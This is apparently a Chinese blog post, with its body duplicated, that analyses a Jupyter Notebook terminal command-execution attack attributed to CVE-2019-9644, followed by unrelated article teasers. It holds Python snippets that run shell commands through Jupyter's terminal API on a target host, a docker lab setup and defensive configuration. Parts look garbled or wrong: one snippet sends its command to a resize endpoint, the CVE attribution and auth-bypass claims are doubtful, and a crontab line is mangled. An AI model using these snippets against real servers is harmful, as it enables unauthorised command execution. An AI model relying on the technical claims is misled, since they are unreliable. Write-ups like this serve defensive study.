1. Jupyter Notebook安全特性解析Jupyter Notebook作为数据科学领域的瑞士军刀其设计初衷是提供便捷的交互式编程环境。但正是这种开放性埋下了安全隐患的种子。我曾在企业内网渗透测试中发现超过60%的Jupyter Notebook实例存在配置缺陷。让我们先理解它的核心架构WebSocket长连接不同于传统HTTP请求终端操作通过持久化连接维持内核隔离机制每个notebook对应独立Python进程但终端功能直接桥接宿主机Shell访问控制缺陷默认配置下仅依赖token认证缺乏细粒度权限控制最危险的是New Terminal功能它本质上是在容器或宿主机内创建了一个完整的bash shell。去年审计某金融公司系统时就发现他们误以为Jupyter的token防护足够安全结果攻击者通过终端功能直接获取了k8s集群凭证。2. CVE-2019-9644漏洞深度剖析这个漏洞的巧妙之处在于它利用了合法功能做非法操作的思维盲区。具体攻击链可分为三个阶段2.1 漏洞触发条件版本范围影响Jupyter Notebook 5.7.0至5.7.8配置要求需启用terminado扩展默认安装认证绕过当使用--no-browser启动时可能暴露未授权访问端点我在复现环境时发现个有趣现象即使设置了密码如果浏览器缓存了token攻击者仍可能通过document.cookie窃取认证凭证。以下是关键攻击代码片段import websocket ws websocket.WebSocket() ws.connect(ws://target:8888/api/terminals/websocket/1) ws.send({argv:[bash,-c,echo $PATH]}\x00) print(ws.recv())2.2 流量特征分析通过Wireshark抓包可见异常特征HTTP阶段POST /api/terminals创建虚拟终端WebSocket阶段/terminals/websocket/[id]传输指令恶意负载包含/bin/sh -c等敏感字符串某次红队行动中我们正是通过检测到异常的WebSocket心跳包间隔正常操作间隔2-5秒攻击往往连续快速发送发现了内网横向移动行为。3. 漏洞复现实战演示3.1 环境搭建要点推荐使用docker快速构建靶场docker run -p 8888:8888 vulhub/jupyter-notebook:5.7.6常见踩坑点浏览器缓存导致token失效终端白屏可能是CORS策略限制需要关闭浏览器同源策略测试时仅限本地复现3.2 分步攻击演示信息收集阶段curl -s http://localhost:8888/api/terminals | jq观察返回的name和last_activity字段命令执行阶段import requests term requests.post(http://localhost:8888/api/terminals).json() cmd {argv: [sh, -c, id/tmp/exploit]} requests.post(fhttp://localhost:8888/api/terminals/{term[name]}/size, jsoncmd)结果验证 检查/tmp/exploit文件内容应包含当前用户信息4. 防御方案设计与实现4.1 临时缓解措施网络层控制location ~* /api/terminals { deny all; }运行时防护jupyter notebook --NotebookApp.terminals_enabledFalse4.2 长效防护策略最小权限原则单独创建jupyter用户并限制sudo权限useradd -m -s /bin/false jupyter chown -R jupyter:jupyter /notebooks审计日志增强监控终端创建事件# jupyter_notebook_config.py c.Application.logging_level DEBUG某次给银行做安全加固时我们结合k8s的PodSecurityPolicy实现了以下防护效果禁止容器内特权模式限制可执行命令白名单实时阻断可疑WebSocket流量5. Web应用安全边界新思考传统WAF往往难以防御这类漏洞因为流量加密在WebSocket通道内请求符合API规范没有明显的SQL注入/XSS特征建议采用纵深防御体系前端禁用不必要的Jupyter插件网络对/terminals路径实施流量清洗主机部署eBPF监控可疑进程树记得有次应急响应攻击者通过终端功能下载了挖矿程序但因为我们在crontab里设置了mesg n tty -s /usr/bin/monitor.sh监控脚本5分钟内就发现了异常CPU负载。这种多层防护的思路远比单纯修补某个CVE更有效。
【漏洞剖析-jupyter_notebook-命令执行】从CVE-2019-9644看Web应用安全边界突破
发布时间:2026/5/16 16:59:42
1. Jupyter Notebook安全特性解析Jupyter Notebook作为数据科学领域的瑞士军刀其设计初衷是提供便捷的交互式编程环境。但正是这种开放性埋下了安全隐患的种子。我曾在企业内网渗透测试中发现超过60%的Jupyter Notebook实例存在配置缺陷。让我们先理解它的核心架构WebSocket长连接不同于传统HTTP请求终端操作通过持久化连接维持内核隔离机制每个notebook对应独立Python进程但终端功能直接桥接宿主机Shell访问控制缺陷默认配置下仅依赖token认证缺乏细粒度权限控制最危险的是New Terminal功能它本质上是在容器或宿主机内创建了一个完整的bash shell。去年审计某金融公司系统时就发现他们误以为Jupyter的token防护足够安全结果攻击者通过终端功能直接获取了k8s集群凭证。2. CVE-2019-9644漏洞深度剖析这个漏洞的巧妙之处在于它利用了合法功能做非法操作的思维盲区。具体攻击链可分为三个阶段2.1 漏洞触发条件版本范围影响Jupyter Notebook 5.7.0至5.7.8配置要求需启用terminado扩展默认安装认证绕过当使用--no-browser启动时可能暴露未授权访问端点我在复现环境时发现个有趣现象即使设置了密码如果浏览器缓存了token攻击者仍可能通过document.cookie窃取认证凭证。以下是关键攻击代码片段import websocket ws websocket.WebSocket() ws.connect(ws://target:8888/api/terminals/websocket/1) ws.send({argv:[bash,-c,echo $PATH]}\x00) print(ws.recv())2.2 流量特征分析通过Wireshark抓包可见异常特征HTTP阶段POST /api/terminals创建虚拟终端WebSocket阶段/terminals/websocket/[id]传输指令恶意负载包含/bin/sh -c等敏感字符串某次红队行动中我们正是通过检测到异常的WebSocket心跳包间隔正常操作间隔2-5秒攻击往往连续快速发送发现了内网横向移动行为。3. 漏洞复现实战演示3.1 环境搭建要点推荐使用docker快速构建靶场docker run -p 8888:8888 vulhub/jupyter-notebook:5.7.6常见踩坑点浏览器缓存导致token失效终端白屏可能是CORS策略限制需要关闭浏览器同源策略测试时仅限本地复现3.2 分步攻击演示信息收集阶段curl -s http://localhost:8888/api/terminals | jq观察返回的name和last_activity字段命令执行阶段import requests term requests.post(http://localhost:8888/api/terminals).json() cmd {argv: [sh, -c, id/tmp/exploit]} requests.post(fhttp://localhost:8888/api/terminals/{term[name]}/size, jsoncmd)结果验证 检查/tmp/exploit文件内容应包含当前用户信息4. 防御方案设计与实现4.1 临时缓解措施网络层控制location ~* /api/terminals { deny all; }运行时防护jupyter notebook --NotebookApp.terminals_enabledFalse4.2 长效防护策略最小权限原则单独创建jupyter用户并限制sudo权限useradd -m -s /bin/false jupyter chown -R jupyter:jupyter /notebooks审计日志增强监控终端创建事件# jupyter_notebook_config.py c.Application.logging_level DEBUG某次给银行做安全加固时我们结合k8s的PodSecurityPolicy实现了以下防护效果禁止容器内特权模式限制可执行命令白名单实时阻断可疑WebSocket流量5. Web应用安全边界新思考传统WAF往往难以防御这类漏洞因为流量加密在WebSocket通道内请求符合API规范没有明显的SQL注入/XSS特征建议采用纵深防御体系前端禁用不必要的Jupyter插件网络对/terminals路径实施流量清洗主机部署eBPF监控可疑进程树记得有次应急响应攻击者通过终端功能下载了挖矿程序但因为我们在crontab里设置了mesg n tty -s /usr/bin/monitor.sh监控脚本5分钟内就发现了异常CPU负载。这种多层防护的思路远比单纯修补某个CVE更有效。
相关文章
GHelper终极指南:3步解决华硕笔记本性能控制难题
GHelper终极指南:3步解决华硕笔记本性能控制难题 【免费下载链接】g-helper Lightweight Armoury Crate alternative for Asus laptops with nearly the same functionality. Works with ROG Zephyrus, Flow, TUF, Strix, Scar, ProArt, Vivobook, Zenbook, Expertb…
保姆级避坑指南:用Python+GPU跑通TSDF三维重建项目(附7-Scenes数据集)
PythonGPU实战:TSDF三维重建避坑指南与7-Scenes数据集全流程解析 三维重建技术正在重塑数字世界与物理世界的边界,而TSDF(Truncated Signed Distance Function)作为其中经典算法,在RGB-D数据处理中展现出独特优势。本文…
10分钟掌握:Diablo Edit2暗黑破坏神2存档修改器完全指南
10分钟掌握:Diablo Edit2暗黑破坏神2存档修改器完全指南 【免费下载链接】diablo_edit Diablo II Character editor. 项目地址: https://gitcode.com/gh_mirrors/di/diablo_edit 你是否厌倦了在暗黑破坏神2中反复刷怪只为获得一件心仪的装备?是否…
Python 开发者五分钟接入 Taotoken 调用 GPT 与 Claude 模型指南
🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 Python 开发者五分钟接入 Taotoken 调用 GPT 与 Claude 模型指南 对于习惯使用 OpenAI 官方 Python SDK 的开发者来说,…
5分钟快速掌握FlicFlac:Windows免费音频格式转换终极指南
5分钟快速掌握FlicFlac:Windows免费音频格式转换终极指南 【免费下载链接】FlicFlac Tiny portable audio converter for Windows (WAV FLAC MP3 OGG APE M4A AAC) 项目地址: https://gitcode.com/gh_mirrors/fl/FlicFlac 还在为不同设备间的音频格式不兼容…
免费在电脑畅玩任天堂Switch游戏:yuzu模拟器完整指南
免费在电脑畅玩任天堂Switch游戏:yuzu模拟器完整指南 【免费下载链接】yuzu 任天堂 Switch 模拟器 项目地址: https://gitcode.com/GitHub_Trending/yu/yuzu 想在电脑上体验Switch游戏的乐趣吗?yuzu模拟器正是你需要的开源解决方案!作…
小程序跨框架迁移技术深度解析:如何用miniprogram-to-vue3实现90%自动化代码转换
小程序跨框架迁移技术深度解析:如何用miniprogram-to-vue3实现90%自动化代码转换 【免费下载链接】miniprogram-to-vue3 项目地址: https://gitcode.com/gh_mirrors/mi/miniprogram-to-vue3 在小程序生态快速发展与多端融合趋势下,技术架构升级成…
免费又好用!FanControl风扇控制软件终极设置指南,3分钟告别电脑噪音烦恼
免费又好用!FanControl风扇控制软件终极设置指南,3分钟告别电脑噪音烦恼 【免费下载链接】FanControl.Releases This is the release repository for Fan Control, a highly customizable fan controlling software for Windows. 项目地址: https://gi…
使用 Python 快速将现有应用接入 Taotoken 的多模型服务
🚀 告别海外账号与网络限制!稳定直连全球优质大模型,限时半价接入中。 👉 点击领取海量免费额度 使用 Python 快速将现有应用接入 Taotoken 的多模型服务 如果你已经在使用 OpenAI 官方的 Python SDK 进行开发,那么将…
SD-PPP:在Photoshop中开启智能设计革命的终极AI插件
SD-PPP:在Photoshop中开启智能设计革命的终极AI插件 【免费下载链接】sd-ppp A Photoshop AI plugin 项目地址: https://gitcode.com/gh_mirrors/sd/sd-ppp 你是否厌倦了在Photoshop和AI工具之间频繁切换,打断了创意的流畅性?SD-PPP正…
NomNom存档编辑器:解放你的《无人深空》游戏体验终极指南
NomNom存档编辑器:解放你的《无人深空》游戏体验终极指南 【免费下载链接】NomNom NomNom is the most complete savegame editor for NMS but also shows additional information around the data youre about to change. You can also easily look up each item i…
5个专业策略:构建企业级本地漏洞情报分析平台
5个专业策略:构建企业级本地漏洞情报分析平台 【免费下载链接】cve-search cve-search - a tool to perform local searches for known vulnerabilities 项目地址: https://gitcode.com/gh_mirrors/cv/cve-search 在当今复杂的网络安全环境中,快速…
贾子理论与AI时代文明竞争:从暴力计算到本质贯通的范式重构
贾子理论与AI时代文明竞争:从暴力计算到本质贯通的范式重构摘要本文基于贾子理论的文明竞争视角,揭示中美AI战略差异的本质并非技术参数较量,而是“暴力计算”与“本质贯通”两种文明范式的根本对立。美国依赖算力堆叠与资本逻辑追求技术霸权…
2026年AI大模型API中转平台排名揭晓,诗云API(ShiyunApi)脱颖而出成省心之选
在AI开发领域,如何接入模型厂商的官方API是一个绕不开的现实问题。对于海外开发者来说,注册、绑卡、调用,三步即可轻松搞定。然而,国内开发者却面临着跨境网络波动、外币支付门槛、发票合规需求以及多厂商Key碎片化管理等诸多“非…
基于飞书与OpenAI构建企业级AI助手:架构、部署与深度优化指南
1. 项目概述:当飞书遇上AI,一个企业级智能助手的诞生 最近在折腾一个挺有意思的项目,叫“ConnectAI-E/feishu-openai”。简单来说,它就是一个桥梁,把飞书这个强大的企业协作平台,和以ChatGPT为代表的OpenA…
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案 【免费下载链接】MPC-BE MPC-BE – универсальный проигрыватель аудио и видеофайлов для операционной системы Windows. 项目地址:…
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南 【免费下载链接】STL-Volume-Model-Calculator STL Volume Model Calculator Python 项目地址: https://gitcode.com/gh_mirrors/st/STL-Volume-Model-Calculator 你是否曾经为3D打印项目…
通过Taotoken CLI工具一键配置团队开发环境与模型密钥
通过Taotoken CLI工具一键配置团队开发环境与模型密钥 1. CLI工具安装与基本使用 Taotoken提供的CLI工具可通过npm全局安装或直接使用npx运行。对于需要频繁使用CLI的团队,推荐全局安装: npm install -g taotoken/taotoken对于临时使用或项目级配置&a…